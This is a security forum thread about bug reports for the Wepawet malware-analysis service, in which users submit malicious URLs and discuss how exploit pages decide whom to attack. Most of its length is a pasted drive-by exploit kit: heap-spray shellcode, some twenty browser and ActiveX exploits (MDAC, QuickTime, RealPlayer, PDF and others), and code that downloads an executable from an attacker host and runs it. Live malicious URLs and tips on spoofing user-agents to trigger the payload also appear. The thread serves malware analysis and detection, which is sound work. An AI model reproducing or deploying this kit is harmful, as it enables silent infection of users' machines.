Wepawet issues

[GmG]

I've done some fixes and I've regenerated the report for your visit:
http://wepawet.iseclab.org/view.php?hash=e589b3bee49bdd62828222543d62fa02&t=1234520577&type=js
Now, the code is decoded correctly.

Thanks.

Exploits were not detected during that visit, so the report still doesn't show them. I've done some other changes that should improve detection, but now the attack is no longer launched when I visit the page, so I cannot test.

They log ip, you can try change number at end of count.php (eg count.php?o=2 , count.php?o=3 )

Thanks reporting and, please, let me know if you find other problems with similar pages!

Code: [Select]

http://wwwhttpinfo.ru/gtx/count.php?o=2

 

[mercutio]

I've pushed out a number of updates to the analysis of PDF files (which are now "officially" handled, i.e., mentioned on the front and support page).
Please, let me know if you spot problems in this area.

[SysAdMini]

Code: [Select]

http://www.rmk-lgs.com/images/m/
http://wepawet.cs.ucsb.edu/view.php?hash=00b4bdccdbcfe164e962f96df31177d2&t=1235191455&type=js

There were some errors. Please try again or let us know of this problem.

Today I have seen this error message for almost any url which I have submitted.

another example:
this url fails. Same problem if you submit the iframes from this and next level manually.

Code: [Select]

hxxp://mydocs.3322.org/pagead/push.htm

[SysAdMini]

Code: [Select]

reddii.ru/traffic/sploit1/index.php
Error message : Invalid Hostname

[mercutio]

The "Invalid Hostname" problem is a known bug: reports for pages hosted on domains that are no longer resolvable are accessible only by knowing the url of the report and not via the index page. I should have a fix for this by tomorrow. Maybe I should really have a "search" functionality to retrieve reports based on URLs and domains.
In any case, the report for the reddii.ru exploit page is:
http://wepawet.cs.ucsb.edu/view.php?hash=1ba0ce027a854e3a405e2e17bad185d3&t=1231734757&type=js

I will also investigate the "There were some errors" problems.

Thanks.

[mercutio]

I have committed a quick patch for what seems the cause of at least some of the errors you experienced. I've re ran the URLs you submitted. The reports are:

• rmk-lgs.com: http://wepawet.cs.ucsb.edu/view.php?hash=00b4bdccdbcfe164e962f96df31177d2&t=1235380189&type=js
• mydocs.3322.org: http://wepawet.cs.ucsb.edu/view.php?hash=10a766b1827bff89c1612670eb9ef74a&t=1235380268&type=js

[mercutio]

I've pushed out an update that should fix both of the above issues.
In particular, regarding the "Invalid Hostname" problem, now if you insert a URL on an invalid domain (e.g., NXDomain) but that URL has been previously analyzed, you're presented with the page that shows the last previous reports. The URL must match exactly a previously analyzed URL for this to work.
I'll probably have a search functionality in the future to improve on this.

[SysAdMini]

exploit undetected

Code: [Select]

thelegion74.com/yu5/index.php

[DiFor]

this's uniq pack sploit

Code: [Select]

var url="http://thelegion74.com/yu5/load.php?id=322";
var m=new Array();
var mf=0;
function hex(num,width){
var digits="0123456789ABCDEF";
var hex=digits.substr(num&0xF,1);
while(num>0xF){
num=num>>>4;
hex=digits.substr(num&0xF,1)+hex;
}
var width=(width?width:0);
while(hex.length<width)hex="0"+hex;
return hex;
}
function addr(addr){
return unescape("%u"+hex(addr&0xFFFF,4)+"%u"+hex((addr>>16)&0xFFFF,4));
}
function unes(str){
var tmp="";
for(var i=0;i<str.length;i+=4){
tmp+=addr((str.charCodeAt(i+3)<<24)+
(str.charCodeAt(i+2)<<16)+
(str.charCodeAt(i+1)<<8)+
str.charCodeAt(i));
}
return unescape(tmp);
}
function hav(){
m=m;
setTimeout("hav()",1000);
}
function gss(ss,sss){
while(ss.length*2<sss)ss+=ss;
ss=ss.substring(0,sss/2);
return ss;
}
function ms(){
var plc=unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u742F%u6568%u656C%u6967%u6E6F%u3437%u632E%u6D6F%u792F%u3575%u6C2F%u616F%u2E64%u6870%u3F70%u6469%u333D%u3232");
CollectGarbage();
if (mf)return(0);
mf=1;
var hsta=0x0c0c0c0c,hbs=0x100000,pl=plc.length*2,sss=hbs-(pl+0x38);
var ss=gss(addr(hsta),sss),hb=(hsta-hbs)/hbs;
for(i=0;i<hb;i++)m[i]=ss+plc;
hav();
return(1);
}
function cobj(obj){
var ret=null;
if(obj.substring(0,1)=="{"){
try{
var clsid=obj.substring(1,obj.length-1);
ret=document.createElement("object");
ret.setAttribute("classid","clsid:"+clsid);
return ret;
}catch(e){
return null;
}
}else{
try{
ret=new ActiveXObject(obj);
return ret;
}catch(e){
return null;
}
}
}
function CreateO(o,n){
var r=null;
try{r=o.CreateObject(n)}catch(e){}
if(!r){try{r=o.CreateObject(n,"")}catch(e){}}
if(!r){try{r=o.CreateObject(n,"","")}catch(e){}}
if(!r){try{r=o.GetObject("",n)}catch(e){}}
if(!r){try{r=o.GetObject(n,"")}catch(e){}}
if(!r){try{r=o.GetObject(n)}catch(e){}}
return(r);
}
function Go(a){
var eurl=url;
var fname="winJiomY4cPhiB.exe";
var fso=CreateO(a,"Scripting.FileSystemObject")
var sap=CreateO(a,"Shell.Application");
var x=CreateO(a,"ADODB.Stream");
var nl=null;
fname=fso.BuildPath(fso.GetSpecialFolder(2),fname);
x.Mode=3;
try{nl=CreateO(a,"Micr"+"osoft.XMLH"+"TTP");nl.open("GET",eurl,false);}
catch(e){try{nl=CreateO(a,"MSXML2.XMLHTTP");nl.open("GET",eurl,false);}
catch(e){try{nl=CreateO(a,"MSXML2.ServerXMLHTTP");nl.open("GET",eurl,false);}
catch(e){try{nl=new XMLHttpRequest();nl.open("GET",eurl,false);}
catch(e){return 0;}}}}
x.Type=1;
nl.send(null);
rb=nl.responseBody;
x.Open();
x.Write(rb);
x.SaveTofile(fname,2);
sap.ShellExecute(fname);
return 1;
}
function mdac() {
var i=0;
var target=new Array(
"BD96C556-65A3-11D0-983A-00C04FC29E36",
"BD96C556-65A3-11D0-983A-00C04FC29E30",
"AB9BCEDD-EC7E-47E1-9322-D4A210617116",
"0006F033-0000-0000-C000-000000000046",
"0006F03A-0000-0000-C000-000000000046",
"6e32070a-766d-4ee6-879c-dc1fa91d2fc3",
"6414512B-B978-451D-A0D8-FCFDF33E833C",
"7F5B7F63-F06F-4331-8A26-339E03C0AE3D",
"06723E09-F4C2-43c8-8358-09FCD1DB0766",
"639F725F-1B2D-4831-A9FD-874847682010",
"BA018599-1DB3-44f9-83B4-461454C84BF8",
"D0C07D56-7C69-43F1-B4A0-25F5A11FAB19",
"E8CCCDDF-CA28-496b-B050-6C07C962476B",null);
while(target[i]){
var a=null;
a=document.createElement("object");
a.setAttribute("classid","clsid:"+target[i]);
if(a){try{var b=CreateO(a,"Shell.Application");if(b){Go(a);}}catch(e){}}
i++;
}
return 0;
}
function wfi() {
try{
obj=cobj("WebViewFolderIcon.WebViewFolderIcon.1");
if(obj){
ms();
for(var i=0;i<128;i++){
var wvfio=new ActiveXObject("WebViewFolderIcon.WebViewFolderIcon.1");
try{wvfio.setSlice(0x7ffffffe,0,0,202116108);}catch(e){}
var wvfit=new ActiveXObject("WebViewFolderIcon.WebViewFolderIcon.1");
}
}
}catch(e){}
return 0;
}
function com() {
try{
obj=cobj("{EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F}");
if(obj){
ms();
z=Math.ceil(0x0c0c0c0c);
z=document.scripts[0].createControlRange().length;
}
}catch(e){}
return 0;
}
function ya1(){
try {
var obj=null;
obj=cobj("{DCE2F8B1-A520-11D4-8FD0-00D0B7730277}");
if(obj){
ms();
var buf = addr(0x0c0c0c0c);
while (buf.length < 5000) buf += buf;
buf = buf.substring(0,5000);
obj.server = buf;
obj.initialize();
obj.send();
}
} catch(e){}
return 0;
}
function ya2(){
try {
var obj=null;
obj=cobj("{9D39223E-AE8E-11D4-8FD3-00D0B7730277}");
if(obj){
ms();
var buf = addr(0x0c0c0c0c);
while (buf.length < 5000) buf += buf;
buf = buf.substring(0,5000);
obj.server = buf;
obj.receive();
}
} catch(e){}
return 0;
}
function fb(){
try {
var obj=null;
obj=cobj("{5C6698D9-7BE4-4122-8EC5-291D84DBD4A0}");
if(obj){
ms();
var buf = addr(0x0c0c0c0c);
while (buf.length < 400) buf += buf;
buf = buf.substring(0,400);
obj.ExtractIptc = buf;
obj.ExtractExif = buf;
}
} catch(e){}
return 0;
}
function mdss(){
try {
var obj=null;
obj=cobj("{EEE78591-FE22-11D0-8BEF-0060081841DE}");
if(obj){
ms();
var buf = addr(0x0c0c0c0c);
for (i=1;i<=9999;i++)
buf += buf;
EngineID="default";
MfgName="default";
ProductName="default";
ModeID="default";
ModeName=buf;
LanguageID=1;
Dialect="default";
Speaker="default";
Style=1;
Gender=1;
Age=1;
Features=1;
Interfaces=1;
EngineFeatures=1;
RankEngineID=1;
RankMfgName=1;
RankProductName=1;
RankModeID=1;
RankModeName=1;
RankLanguage=1;
RankDialect=1;
RankSpeaker=1;
RankStyle=1;
RankGender=1;
RankAge=1;
RankFeatures=1;
RankInterfaces=1;
RankEngineFeatures=1;
obj.FindEngine(EngineID, MfgName, ProductName, ModeID, ModeName, LanguageID, Dialect, Speaker, Style, Gender, Age, Features, Interfaces, EngineFeatures, RankEngineID, RankMfgName, RankProductName, RankModeID, RankModeName, RankLanguage, RankDialect, RankSpeaker, RankStyle, RankGender, RankAge, RankFeatures, RankInterfaces, RankEngineFeatures);

}
} catch(e){}
return 0;
}

function office(){
var sfrom = url+"&opr=1";
var fuckavo="SB";
var x;
var fuckavp="SB";
var obj;
var fuckavx="SB";
var mycars = new Array();
var fuckava="SB";
mycars[0] = "c:/Program Files/Outlook Express/WAB.EXE";
mycars[1] = "d:/Program Files/Outlook Express/WAB.EXE";
mycars[2] = "e:/Program Files/Outlook Express/WAB.EXE";
var objlcx = cobj("snpvw.Snapshot Viewer Control.1");
if(objlcx) {
setTimeout('window.location = "ldap://"', 3000);
for (x in mycars){
obj = cobj("snpvw.Snapshot Viewer Control.1")
var buf1 = sfrom;
var fuckavg="SB";
var buf2=mycars[x];
var fuckavj="SB";
obj.Zoom = 0;
obj.ShowNavigationButtons = false;
obj.AllowContextMenu = false;
obj.SnapshotPath = buf1;
try {
obj.CompressedPath = buf2;
obj.PrintSnapshot();
}catch(e){}
}
}
var fuckavqgga="SB";
var fuckavqggxa="SBd";
return 0;
}
function dl(){
try{
var obj=null;
obj=cobj("Downloader.DLoader.1");
if (obj){
obj.DownloadAndInstall(url);
}
}catch(e){}
return 0;
}
function wks(){
try{
var obj=null;
obj=cobj("{00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6}");
if(obj){
ms();
var num = 202116108;
obj.WksPictureInterface = num;
}
}catch(e){}
return 0;
}
function ogame(){
try{
var obj=null;
obj=cobj("{F917534D-535B-416B-8E8F-0C04756C31A8}");
if(obj){
ms();
var buf = "";
while (buf.length < 600) buf += "\x0c\x0c\x0c\x0c";
obj.IEStartNative(buf);
}
}catch(e){}
return 0;
}
function ca(){
try{
var obj=null;
obj=cobj("{BF6EFFF3-4558-4C4C-ADAF-A87891C5F3A3}");
if (obj.AddColumn) {
ms();
var buf = addr(0x0c0c0c0c);
while(buf.length < 128)buf += buf;
buf = buf.substring(0, 128);
obj.AddColumn(buf,1);
}
}catch(e){}
return 0;
}
function buddy(){
try {
var obj=null;
obj = cobj("Sb.SuperBuddy");
if (obj) {
ms();
obj.LinkSBIcons(0x0c0c0c0c);
}
} catch(e){}
return 0;
}
function gomweb(){
try {
var obj=null;
obj = cobj("GomWebCtrl.GomManager.1");
if (obj) {
ms();
var buf="AAAA";
while (buf.length < 506) buf += buf;
buf = buf.substring(0,506);
buf += addr(0x0c0c0c0c);
obj.OpenURL(buf);
}
} catch(e){}
return 0;
}
function xmlcore(){
try {
var xml = null;
var xml = cobj("Msxml2.XMLHTTP.6.0");
if (xml){
xml = cobj("Msxml2.XMLHTTP.4.0");
}
if(!xml)return 0;
var obj=null;
obj = cobj("{88d969c5-f192-11d4-a65f-0040963251e5}");
obj = obj.object
if(obj) {
ms();
try {obj.open(new Array(),new Array(),new Array(),new Array(),new Array());} catch(e) {};
obj.open(new Object(),new Object(),new Object(),new Object(),new Object());
obj.setRequestHeader(new Object(),"...");
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
}
} catch(e){}
return 0;
}
function quick(){
try {
var obj=null;
obj = cobj("QuickTime.QuickTime.4");
if (obj) {
ms();
var buf = "";
for(var i=0;i<200;i++) {
buf += "AAAA";
}
buf += "AAA";
for(var i=0;i<3;i++)buf += "\x0c\x0c\x0c\x0c";
var my_div = document.createElement("div");
my_div.innerHTML =
"<object classid=\"clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B\" width=\"200\" height=\"200\">" +
"<param name=\"src\" value=\"object_rtsp\">" +
"<param name=\"type\" value=\"image/x-quicktime\">" +
"<param name=\"autoplay\" value=\"true\">" +
"<param name=\"qtnext1\" value=\"<rtsp://BBBB:"+buf+">T<myself>\">" +
"<param name=\"target\" value=\"myself\">" +
"</object>";
document.body.appendChild(my_div);

}
} catch(e) {}
return 0;
}
function real(){
try {
var obj=null;
obj = cobj("IERPCtl.IERPCtl.1");
if (obj) {
if(obj.PlayerProperty("PRODUCTVERSION")>"6.0.14.552") {
obj = cobj("{2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93}");
ms();
var m = "";
var buf = addr(0x0c0c0c0c);
while (buf.length < 32) buf += buf;
buf = buf.substring(0,32);
m = obj.Console;
obj.Console = buf;
obj.Console = m;
m = obj.Console;
obj.Console = buf;
obj.Console = m;
}
}
} catch(e){}
return 0;
}
function ntaudio(){
try{
var obj=null;
obj=cobj("{77829F14-D911-40FF-A2F0-D11DB8D6D0BC}");
if(obj){
ms();
var buf = addr(0x0c0c0c0c);
while (buf.length < 5200) buf += buf;
buf = buf.substring(0,5200);
obj.SetFormatLikeSample(buf);
}
}catch(e){}
return 0;
}
function creative(){
try{
var obj=null;
obj=cobj("{0A5FD7C5-A45C-49FC-ADB5-9952547D5715}");
if(obj){
ms();
var buf = addr(0x0c0c0c0c);
while (buf.length < 512) buf += buf;
buf = buf.substring(0,512);
obj.cachefolder = buf;
}
}catch(e){}
return 0;
}

function pdf(){
try {
var obj = null;
obj = cobj("AcroPDF.PDF");
if (!obj) {
obj = cobj("PDF.PdfCtrl");
}
if (obj) {
document.write("<iframe src='http://thelegion74.com/yu5/pdf.php?id=322' width=1 height=1 frameborder=0></iframe>");
setTimeout('pdf2();',10000);
}
} catch(e) {
document.write("<iframe src='http://thelegion74.com/yu5/pdf.php?id=322' width=1 height=1 frameborder=0></iframe>");
setTimeout('pdf2();',10000);
}
return 0;
}
function pdf2(){
var obj = null;
obj = cobj("AcroPDF.PDF");
if (!obj) {
obj = cobj("PDF.PdfCtrl");
}
if (obj) {
wnd=window;
while (wnd.parent!=wnd){ wnd=wnd.parent; }
wnd.location="http://thelegion74.com/yu5/pdf.php?id=322&vis=1";
}
return 0;
}
function wme(){
try {
var obj=null;
obj=cobj("{A8D3AD02-7508-4004-B2E9-AD33F087F43C}");
if(obj){
ms();
var buf = addr(0x0c0c0c0c);
while (buf.length < 2000) buf += buf;
buf = buf.substring(0,2000);
obj.GetDetailsString(buf,1);
}
} catch(e){}
return 0;
}

if (
mdac() ||
office() ||
dl() ||
pdf() ||
wme() ||
wfi() ||
com() ||
ya1() ||
ya2() ||
fb() ||
mdss() ||
creative() ||
wks() ||
ogame() ||
ca() ||
buddy() ||
gomweb() ||
xmlcore() ||
quick() ||
real() ||
ntaudio()
) {}


[mercutio]

Mmmh, I always get a 302 to google.com from that page (in 4 visits since mid january). But the toolkit is still there, in fact I can get the pdf file:
http://wepawet.cs.ucsb.edu/view.php?hash=a27b690fbe272bc0d6a81df5c4e5755b&t=1237219096&type=js

Do you know if they expect a specific user-agent/referer/ip location before serving the "correct" (i.e., malicious) index.php page?

Regarding the sploit kit, not sure it's uniq: there's an elfiesta admin page at:

Code: [Select]

http://thelegion74.com/yu5/admin.php

Thanks

[Serg]

i've tried to use referer from here http://www.honeynet.cz/wm/wm?id=f3849038bf6f21b9b7131fd68f with several user-agent/ip. nothing. same google. DiFor, how did u get that script?

[GmG]

Work without user agent (I use wget) return
http://wepawet.iseclab.org/view.php?hash=ef4a254e1c9601668caa2caa5997600a&type=js

With user agent Firefox return

Code: [Select]

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
http://wepawet.iseclab.org/view.php?hash=4b6c3760defba2d188796257f178ec64&type=js

With user agent IE 6 return

Code: [Select]

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
http://wepawet.iseclab.org/view.php?hash=890e99abad45d88398905cef664f9d57&type=js

Work multiple times
Work   without referer

My IP form Italy

[Serg]

u r target! Checked via helpblock.me with US IPs, got the exploit. But from home still google. 

[DiFor]

Initially, rent sploits with a user-agent IE6, Winxp sp1. Then check on the other browsers.

ps: fiesta, uniq, all one and the same. authors are different, the same code.

[sowhat-x]

hxxp://abbcp.cn/bm_a/controller.php

---> 58.65.237.1

On the same ip,another one domain is currently hosted...

hxxp://strhq.cn/tds_a/go.php?id=2

So far so good,now this one redirects to...

hxxp://58.65.237.2/?t=1

---> Wepapet seemed to have ran into trouble with it? ("There was a network error accessing the requested URL: Not Found")
http://wepawet.iseclab.org/view.php?hash=2f5846b4d762532b20efbec069ffc219&t=1237876829&type=js
When requesting the previous strhq.cn url that redirects there,it returns:

Code: [Select]

hxxp://strhq.cn/tds_a/go.php?id=2 302 text/html
hxxp://58.65.237.2/?t=1                 Error application/x-emptyhttp://wepawet.iseclab.org/view.php?hash=992bceb2dfbb43ca1f3b154ea0bfea10&t=1237877077&type=js

Edit: Seems to me like 58.65.237.2 doesn't let you access it from the same ip twice,but I might be wrong on this...